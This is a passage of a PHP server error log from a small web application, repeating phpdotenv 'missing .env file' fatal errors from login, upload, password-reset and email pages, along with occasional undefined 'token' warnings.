/home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php on line 68 [10-Oct-2025 08:31:55 UTC] PHP Fatal error: Uncaught Dotenv\Exception\InvalidPathException: Unable to read any of the environment file(s) at [/home/emeraadmin/public_html/Classes/../.env]. in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php:68 Stack trace: #0 /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Dotenv.php(222): Dotenv\Store\FileStore->read() #1 /home/emeraadmin/public_html/Classes/Database.php(23): Dotenv\Dotenv->load() #2 /home/emeraadmin/public_html/Service/UserService.php(12): Database->__construct() #3 /home/emeraadmin/public_html/pages/authenticateuser.php(6): UserService->__construct() #4 {main} thrown in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php on line 68 [11-Oct-2025 06:53:17 UTC] PHP Fatal error: Uncaught Dotenv\Exception\InvalidPathException: Unable to read any of the environment file(s) at [/home/emeraadmin/public_html/Classes/../.env]. in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php:68 Stack trace: #0 /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Dotenv.php(222): Dotenv\Store\FileStore->read() #1 /home/emeraadmin/public_html/Classes/Database.php(23): Dotenv\Dotenv->load() #2 /home/emeraadmin/public_html/Service/UserService.php(12): Database->__construct() #3 /home/emeraadmin/public_html/pages/authenticateuser.php(6): UserService->__construct() #4 {main} thrown in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php on line 68 [11-Oct-2025 06:53:27 UTC] PHP Fatal error: Uncaught Dotenv\Exception\InvalidPathException: Unable to read any of the environment file(s) at [/home/emeraadmin/public_html/Classes/../.env]. in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php:68 Stack trace: #0 /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Dotenv.php(222): Dotenv\Store\FileStore->read() #1 /home/emeraadmin/public_html/Classes/Database.php(23): Dotenv\Dotenv->load() #2 /home/emeraadmin/public_html/Service/UserService.php(12): Database->__construct() #3 /home/emeraadmin/public_html/pages/authenticateuser.php(6): UserService->__construct() #4 {main} thrown in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php on line 68 [11-Oct-2025 06:53:48 UTC] PHP Fatal error: Uncaught Dotenv\Exception\InvalidPathException: Unable to read any of the environment file(s) at [/home/emeraadmin/public_html/Classes/../.env]. in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php:68 Stack trace: #0 /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Dotenv.php(222): Dotenv\Store\FileStore->read() #1 /home/emeraadmin/public_html/Classes/Database.php(23): Dotenv\Dotenv->load() #2 /home/emeraadmin/public_html/Service/UserService.php(12): Database->__construct() #3 /home/emeraadmin/public_html/pages/authenticateuser.php(6): UserService->__construct() #4 {main} thrown in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php on line 68 [11-Oct-2025 06:54:01 UTC] PHP Fatal error: Uncaught Dotenv\Exception\InvalidPathException: Unable to read any of the environment file(s) at [/home/emeraadmin/public_html/Classes/../.env]. in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php:68 Stack trace: #0 /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Dotenv.php(222): Dotenv\Store\FileStore->read() #1 /home/emeraadmin/public_html/Classes/Database.php(23): Dotenv\Dotenv->load() #2 /home/emeraadmin/public_html/Service/UserService.php(12): Database->__construct() #3 /home/emeraadmin/public_html/pages/authenticateuser.php(6): UserService->__construct() #4 {main} thrown in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php on line 68 [14-Oct-2025 10:32:21 UTC] PHP Fatal error: Uncaught Dotenv\Exception\InvalidPathException: Unable to read any of the environment file(s) at [/home/emeraadmin/public_html/Classes/../.env]. in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php:68 Stack trace: #0 /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Dotenv.php(222): Dotenv\Store\FileStore->read() #1 /home/emeraadmin/public_html/Classes/Database.php(23): Dotenv\Dotenv->load() #2 /home/emeraadmin/public_html/Service/UserService.php(12): Database->__construct() #3 /home/emeraadmin/public_html/pages/authenticateuser.php(6): UserService->__construct() #4 {main} thrown in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php on line 68 [15-Apr-2026 06:10:21 UTC] PHP Warning: Undefined array key "token" in /home/emeraadmin/public_html/pages/reset-password.php on line 67 [15-Apr-2026 06:10:51 UTC] PHP Fatal error: Uncaught Dotenv\Exception\InvalidPathException: Unable to read any of the environment file(s) at [/home/emeraadmin/public_html/pages/../.env]. in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php:68 Stack trace: #0 /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Dotenv.php(222): Dotenv\Store\FileStore->read() #1 /home/emeraadmin/public_html/pages/send_reset_link.php(6): Dotenv\Dotenv->load() #2 {main} thrown in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php on line 68 [15-Apr-2026 06:10:57 UTC] PHP Fatal error: Uncaught Dotenv\Exception\InvalidPathException: Unable to read any of the environment file(s) at [/home/emeraadmin/public_html/pages/../.env]. in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php:68 Stack trace: #0 /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Dotenv.php(222): Dotenv\Store\FileStore->read() #1 /home/emeraadmin/public_html/pages/send_reset_link.php(6): Dotenv\Dotenv->load() #2 {main} thrown in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php on line 68 [15-Apr-2026 06:11:00 UTC] PHP Fatal error: Uncaught Dotenv\Exception\InvalidPathException: Unable to read any of the environment file(s) at [/home/emeraadmin/public_html/pages/../.env]. in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php:68 Stack trace: #0 /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Dotenv.php(222): Dotenv\Store\FileStore->read() #1 /home/emeraadmin/public_html/pages/send_reset_link.php(6): Dotenv\Dotenv->load() #2 {main} thrown in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php on line 68 [15-Apr-2026 06:11:05 UTC] PHP Fatal error: Uncaught Dotenv\Exception\InvalidPathException: Unable to read any of the environment file(s) at [/home/emeraadmin/public_html/Classes/../.env]. in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php:68 Stack trace: #0 /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Dotenv.php(222): Dotenv\Store\FileStore->read() #1 /home/emeraadmin/public_html/Classes/Database.php(23): Dotenv\Dotenv->load() #2 /home/emeraadmin/public_html/Service/UserService.php(12): Database->__construct() #3 /home/emeraadmin/public_html/pages/authenticateuser.php(6): UserService->__construct() #4 {main} thrown in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php on line 68 [15-Apr-2026 09:20:38 UTC] PHP Fatal error: Uncaught Dotenv\Exception\InvalidPathException: Unable to read any of the environment file(s) at [/home/emeraadmin/public_html/Classes/../.env]. in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php:68 Stack trace: #0 /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Dotenv.php(222): Dotenv\Store\FileStore->read() #1 /home/emeraadmin/public_html/Classes/Database.php(23): Dotenv\Dotenv->load() #2 /home/emeraadmin/public_html/Service/ServiceService.php(12): Database->__construct() #3 /home/emeraadmin/public_html/pages/process_upload.php(16): ServiceService->__construct() #4 {main} thrown in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php on line 68 [15-Apr-2026 09:20:51 UTC] PHP Fatal error: Uncaught Dotenv\Exception\InvalidPathException: Unable to read any of the environment file(s) at [/home/emeraadmin/public_html/Classes/../.env]. in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php:68 Stack trace: #0 /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Dotenv.php(222): Dotenv\Store\FileStore->read() #1 /home/emeraadmin/public_html/Classes/Database.php(23): Dotenv\Dotenv->load() #2 /home/emeraadmin/public_html/Service/UserService.php(12): Database->__construct() #3 /home/emeraadmin/public_html/pages/authenticateuser.php(6): UserService->__construct() #4 {main} thrown in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php on line 68 [15-Apr-2026 09:24:17 UTC] PHP Warning: Undefined array key "token" in /home/emeraadmin/public_html/pages/reset-password.php on line 67 [15-Apr-2026 09:24:17 UTC] PHP Fatal error: Uncaught Dotenv\Exception\InvalidPathException: Unable to read any of the environment file(s) at [/home/emeraadmin/public_html/pages/../.env]. in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php:68 Stack trace: #0 /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Dotenv.php(222): Dotenv\Store\FileStore->read() #1 /home/emeraadmin/public_html/pages/send_reset_link.php(6): Dotenv\Dotenv->load() #2 {main} thrown in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php on line 68 [15-Apr-2026 09:25:37 UTC] PHP Fatal error: Uncaught Dotenv\Exception\InvalidPathException: Unable to read any of the environment file(s) at [/home/emeraadmin/public_html/pages/../.env]. in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php:68 Stack trace: #0 /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Dotenv.php(222): Dotenv\Store\FileStore->read() #1 /home/emeraadmin/public_html/pages/send_email_to_workers.php(6): Dotenv\Dotenv->load() #2 {main} thrown in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php on line 68 [15-Apr-2026 09:32:59 UTC] PHP Fatal error: Uncaught Dotenv\Exception\InvalidPathException: Unable to read any of the environment file(s) at [/home/emeraadmin/public_html/pages/../.env]. in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php:68 Stack trace: #0 /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Dotenv.php(222): Dotenv\Store\FileStore->read() #1 /home/emeraadmin/public_html/pages/send_task_email_to_workers.php(5): Dotenv\Dotenv->load() #2 {main} thrown in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php on line 68 [15-Apr-2026 10:57:02 UTC] PHP Fatal error: Uncaught Dotenv\Exception\InvalidPathException: Unable to read any of the environment file(s) at [/home/emeraadmin/public_html/pages/../.env]. in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php:68 Stack trace: #0 /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Dotenv.php(222): Dotenv\Store\FileStore->read() #1 /home/emeraadmin/public_html/pages/send_reset_link.php(6): Dotenv\Dotenv->load() #2 {main} thrown in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php on line 68 [15-Apr-2026 10:57:17 UTC] PHP Fatal error: Uncaught Dotenv\Exception\InvalidPathException: Unable to read any of the environment file(s) at [/home/emeraadmin/public_html/Classes/../.env]. in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php:68 Stack trace: #0 /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Dotenv.php(222): Dotenv\Store\FileStore->read() #1 /home/emeraadmin/public_html/Classes/Database.php(23): Dotenv\Dotenv->load() #2 /home/emeraadmin/public_html/Service/ServiceService.php(12): Database->__construct() #3 /home/emeraadmin/public_html/pages/process_upload.php(16): ServiceService->__construct() #4 {main} thrown in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php on line 68 [15-Apr-2026 11:12:02 UTC] PHP Fatal error: Uncaught Dotenv\Exception\InvalidPathException: Unable to read any of the environment file(s) at [/home/emeraadmin/public_html/pages/../.env]. in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php:68 Stack trace: #0 /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Dotenv.php(222): Dotenv\Store\FileStore->read() #1 /home/emeraadmin/public_html/pages/send_task_email_to_workers.php(5): Dotenv\Dotenv->load() #2 {main} thrown in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php on line 68 [15-Apr-2026 11:13:16 UTC] PHP Warning: Undefined array key "token" in /home/emeraadmin/public_html/pages/reset-password.php on line 67 [15-Apr-2026 12:05:41 UTC] PHP Fatal error: Uncaught Dotenv\Exception\InvalidPathException: Unable to read any of the environment file(s) at [/home/emeraadmin/public_html/pages/../.env]. in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php:68 Stack trace: #0 /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Dotenv.php(222): Dotenv\Store\FileStore->read() #1 /home/emeraadmin/public_html/pages/send_task_email_to_workers.php(5): Dotenv\Dotenv->load() #2 {main} thrown in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php on line 68 [15-Apr-2026 12:08:57 UTC] PHP Fatal error: Uncaught Dotenv\Exception\InvalidPathException: Unable to read any of the environment file(s) at [/home/emeraadmin/public_html/pages/../.env]. in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php:68 Stack trace: #0 /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Dotenv.php(222): Dotenv\Store\FileStore->read() #1 /home/emeraadmin/public_html/pages/send_email_to_workers.php(6): Dotenv\Dotenv->load() #2 {main} thrown in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php on line 68 [15-Apr-2026 12:22:52 UTC] PHP Fatal error: Uncaught Dotenv\Exception\InvalidPathException: Unable to read any of the environment file(s) at [/home/emeraadmin/public_html/pages/../.env]. in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php:68 Stack trace: #0 /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Dotenv.php(222): Dotenv\Store\FileStore->read() #1 /home/emeraadmin/public_html/pages/send_reset_link.php(6): Dotenv\Dotenv->load() #2 {main} thrown in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php on line 68 [15-Apr-2026 12:55:22 UTC] PHP Warning: Undefined array key "token" in /home/emeraadmin/public_html/pages/reset-password.php on line 67 [15-Apr-2026 12:55:23 UTC] PHP Fatal error: Uncaught Dotenv\Exception\InvalidPathException: Unable to read any of the environment file(s) at [/home/emeraadmin/public_html/Classes/../.env]. in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php:68 Stack trace: #0 /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Dotenv.php(222): Dotenv\Store\FileStore->read() #1 /home/emeraadmin/public_html/Classes/Database.php(23): Dotenv\Dotenv->load() #2 /home/emeraadmin/public_html/Service/ServiceService.php(12): Database->__construct() #3 /home/emeraadmin/public_html/pages/process_upload.php(16): ServiceService->__construct() #4 {main} thrown in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php on line 68 [15-Apr-2026 13:12:07 UTC] PHP Fatal error: Uncaught Dotenv\Exception\InvalidPathException: Unable to read any of the environment file(s) at [/home/emeraadmin/public_html/pages/../.env]. in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php:68 Stack trace: #0 /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Dotenv.php(222): Dotenv\Store\FileStore->read() #1 /home/emeraadmin/public_html/pages/send_email_to_workers.php(6): Dotenv\Dotenv->load() #2 {main} thrown in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php on line 68 [15-Apr-2026 13:15:26 UTC] PHP Fatal error: Uncaught Dotenv\Exception\InvalidPathException: Unable to read any of the environment file(s) at [/home/emeraadmin/public_html/Classes/../.env]. in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php:68 Stack trace: #0 /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Dotenv.php(222): Dotenv\Store\FileStore->read() #1 /home/emeraadmin/public_html/Classes/Database.php(23): Dotenv\Dotenv->load() #2 /home/emeraadmin/public_html/Service/UserService.php(12): Database->__construct() #3 /home/emeraadmin/public_html/pages/authenticateuser.php(6): UserService->__construct() #4 {main} thrown in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php on line 68 [15-Apr-2026 13:19:47 UTC] PHP Fatal error: Uncaught Dotenv\Exception\InvalidPathException: Unable to read any of the environment file(s) at [/home/emeraadmin/public_html/Classes/../.env]. in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php:68 Stack trace: #0 /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Dotenv.php(222): Dotenv\Store\FileStore->read() #1 /home/emeraadmin/public_html/Classes/Database.php(23): Dotenv\Dotenv->load() #2 /home/emeraadmin/public_html/Service/UserService.php(12): Database->__construct() #3 /home/emeraadmin/public_html/pages/authenticateuser.php(6): UserService->__construct() #4 {main} thrown in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php on line 68 [15-Apr-2026 16:54:51 UTC] PHP Fatal error: Uncaught Dotenv\Exception\InvalidPathException: Unable to read any of the environment file(s) at [/home/emeraadmin/public_html/Classes/../.env]. in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php:68 Stack trace: #0 /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Dotenv.php(222): Dotenv\Store\FileStore->read() #1 /home/emeraadmin/public_html/Classes/Database.php(23): Dotenv\Dotenv->load() #2 /home/emeraadmin/public_html/Service/UserService.php(12): Database->__construct() #3 /home/emeraadmin/public_html/pages/authenticateuser.php(6): UserService->__construct() #4 {main} thrown in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php on line 68 [16-Apr-2026 07:54:19 UTC] PHP Fatal error: Uncaught Dotenv\Exception\InvalidPathException: Unable to read any of the environment file(s) at [/home/emeraadmin/public_html/Classes/../.env]. in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php:68 Stack trace: #0 /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Dotenv.php(222): Dotenv\Store\FileStore->read() #1 /home/emeraadmin/public_html/Classes/Database.php(23): Dotenv\Dotenv->load() #2 /home/emeraadmin/public_html/Service/ServiceService.php(12): Database->__construct() #3 /home/emeraadmin/public_html/pages/process_upload.php(16): ServiceService->__construct() #4 {main} thrown in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php on line 68 [16-Apr-2026 07:55:08 UTC] PHP Warning: Undefined array key "token" in /home/emeraadmin/public_html/pages/reset-password.php on line 67 [16-Apr-2026 07:58:04 UTC] PHP Fatal error: Uncaught Dotenv\Exception\InvalidPathException: Unable to read any of the environment file(s) at [/home/emeraadmin/public_html/pages/../.env]. in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php:68 Stack trace: #0 /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Dotenv.php(222): Dotenv\Store\FileStore->read() #1 /home/emeraadmin/public_html/pages/send_email_to_workers.php(6): Dotenv\Dotenv->load() #2 {main} thrown in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php on line 68 [16-Apr-2026 07:59:45 UTC] PHP Fatal error: Uncaught Dotenv\Exception\InvalidPathException: Unable to read any of the environment file(s) at [/home/emeraadmin/public_html/pages/../.env]. in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php:68 Stack trace: #0 /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Dotenv.php(222): Dotenv\Store\FileStore->read() #1 /home/emeraadmin/public_html/pages/send_task_email_to_workers.php(5): Dotenv\Dotenv->load() #2 {main} thrown in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php on line 68 [16-Apr-2026 07:59:45 UTC] PHP Fatal error: Uncaught Dotenv\Exception\InvalidPathException: Unable to read any of the environment file(s) at [/home/emeraadmin/public_html/pages/../.env]. in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php:68 Stack trace: #0 /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Dotenv.php(222): Dotenv\Store\FileStore->read() #1 /home/emeraadmin/public_html/pages/send_task_email_to_workers.php(5): Dotenv\Dotenv->load() #2 {main} thrown in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php on line 68 [16-Apr-2026 08:01:51 UTC] PHP Fatal error: Uncaught Dotenv\Exception\InvalidPathException: Unable to read any of the environment file(s) at [/home/emeraadmin/public_html/pages/../.env]. in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php:68 Stack trace: #0 /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Dotenv.php(222): Dotenv\Store\FileStore->read() #1 /home/emeraadmin/public_html/pages/send_task_email_to_workers.php(5): Dotenv\Dotenv->load() #2 {main} thrown in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php on line 68 [16-Apr-2026 08:02:16 UTC] PHP Fatal error: Uncaught Dotenv\Exception\InvalidPathException: Unable to read any of the environment file(s) at [/home/emeraadmin/public_html/pages/../.env]. in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php:68 Stack trace: #0 /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Dotenv.php(222): Dotenv\Store\FileStore->read() #1 /home/emeraadmin/public_html/pages/send_task_email_to_workers.php(5): Dotenv\Dotenv->load() #2 {main} thrown in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php on line 68 [16-Apr-2026 08:02:52 UTC] PHP Fatal error: Uncaught Dotenv\Exception\InvalidPathException: Unable to read any of the environment file(s) at [/home/emeraadmin/public_html/pages/../.env]. in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php:68 Stack trace: #0 /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Dotenv.php(222): Dotenv\Store\FileStore->read() #1 /home/emeraadmin/public_html/pages/send_task_email_to_workers.php(5): Dotenv\Dotenv->load() #2 {main} thrown in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php on line 68 [16-Apr-2026 08:03:05 UTC] PHP Fatal error: Uncaught Dotenv\Exception\InvalidPathException: Unable to read any of the environment file(s) at [/home/emeraadmin/public_html/pages/../.env]. in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php:68 Stack trace: #0 /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Dotenv.php(222): Dotenv\Store\FileStore->read() #1 /home/emeraadmin/public_html/pages/send_task_email_to_workers.php(5): Dotenv\Dotenv->load() #2 {main} thrown in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php on line 68 [16-Apr-2026 08:03:15 UTC] PHP Fatal error: Uncaught Dotenv\Exception\InvalidPathException: Unable to read any of the environment file(s) at [/home/emeraadmin/public_html/pages/../.env]. in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php:68 Stack trace: #0 /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Dotenv.php(222): Dotenv\Store\FileStore->read() #1 /home/emeraadmin/public_html/pages/send_task_email_to_workers.php(5): Dotenv\Dotenv->load() #2 {main} thrown in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php on line 68 [16-Apr-2026 08:03:25 UTC] PHP Fatal error: Uncaught Dotenv\Exception\InvalidPathException: Unable to read any of the environment file(s) at [/home/emeraadmin/public_html/pages/../.env]. in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php:68 Stack trace: #0 /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Dotenv.php(222): Dotenv\Store\FileStore->read() #1 /home/emeraadmin/public_html/pages/send_task_email_to_workers.php(5): Dotenv\Dotenv->load() #2 {main} thrown in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php on line 68 [16-Apr-2026 08:03:48 UTC] PHP Fatal error: Uncaught Dotenv\Exception\InvalidPathException: Unable to read any of the environment file(s) at [/home/emeraadmin/public_html/pages/../.env]. in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php:68 Stack trace: #0 /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Dotenv.php(222): Dotenv\Store\FileStore->read() #1 /home/emeraadmin/public_html/pages/send_task_email_to_workers.php(5): Dotenv\Dotenv->load() #2 {main} thrown in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php on line 68 [16-Apr-2026 08:04:46 UTC] PHP Fatal error: Uncaught Dotenv\Exception\InvalidPathException: Unable to read any of the environment file(s) at [/home/emeraadmin/public_html/pages/../.env]. in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php:68 Stack trace: #0 /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Dotenv.php(222): Dotenv\Store\FileStore->read() #1 /home/emeraadmin/public_html/pages/send_email_to_workers.php(6): Dotenv\Dotenv->load() #2 {main} thrown in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php on line 68 [16-Apr-2026 08:05:15 UTC] PHP Fatal error: Uncaught Dotenv\Exception\InvalidPathException: Unable to read any of the environment file(s) at [/home/emeraadmin/public_html/pages/../.env]. in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php:68 Stack trace: #0 /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Dotenv.php(222): Dotenv\Store\FileStore->read() #1 /home/emeraadmin/public_html/pages/send_email_to_workers.php(6): Dotenv\Dotenv->load() #2 {main} thrown in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php on line 68 [16-Apr-2026 08:05:26 UTC] PHP Fatal error: Uncaught Dotenv\Exception\InvalidPathException: Unable to read any of the environment file(s) at [/home/emeraadmin/public_html/pages/../.env]. in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php:68 Stack trace: #0 /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Dotenv.php(222): Dotenv\Store\FileStore->read() #1 /home/emeraadmin/public_html/pages/send_task_email_to_workers.php(5): Dotenv\Dotenv->load() #2 {main} thrown in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php on line 68 [16-Apr-2026 08:06:08 UTC] PHP Fatal error: Uncaught Dotenv\Exception\InvalidPathException: Unable to read any of the environment file(s) at [/home/emeraadmin/public_html/pages/../.env]. in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php:68 Stack trace: #0 /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Dotenv.php(222): Dotenv\Store\FileStore->read() #1 /home/emeraadmin/public_html/pages/send_email_to_workers.php(6): Dotenv\Dotenv->load() #2 {main} thrown in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php on line 68 [16-Apr-2026 08:06:08 UTC] PHP Fatal error: Uncaught Dotenv\Exception\InvalidPathException: Unable to read any of the environment file(s) at [/home/emeraadmin/public_html/pages/../.env]. in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php:68 Stack trace: #0 /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Dotenv.php(222): Dotenv\Store\FileStore->read() #1 /home/emeraadmin/public_html/pages/send_task_email_to_workers.php(5): Dotenv\Dotenv->load() #2 {main} thrown in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php on line 68 [16-Apr-2026 08:06:44 UTC] PHP Fatal error: Uncaught Dotenv\Exception\InvalidPathException: Unable to read any of the environment file(s) at [/home/emeraadmin/public_html/pages/../.env]. in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php:68 Stack trace: #0 /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Dotenv.php(222): Dotenv\Store\FileStore->read() #1 /home/emeraadmin/public_html/pages/send_email_to_workers.php(6): Dotenv\Dotenv->load() #2 {main} thrown in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php on line 68 [16-Apr-2026 08:06:54 UTC] PHP Fatal error: Uncaught Dotenv\Exception\InvalidPathException: Unable to read any of the environment file(s) at [/home/emeraadmin/public_html/pages/../.env]. in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php:68 Stack trace: #0 /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Dotenv.php(222): Dotenv\Store\FileStore->read() #1 /home/emeraadmin/public_html/pages/send_email_to_workers.php(6): Dotenv\Dotenv->load() #2 {main} thrown in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php on line 68 [16-Apr-2026 08:07:19 UTC] PHP Fatal error: Uncaught Dotenv\Exception\InvalidPathException: Unable to read any of the environment file(s) at [/home/emeraadmin/public_html/pages/../.env]. in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php:68 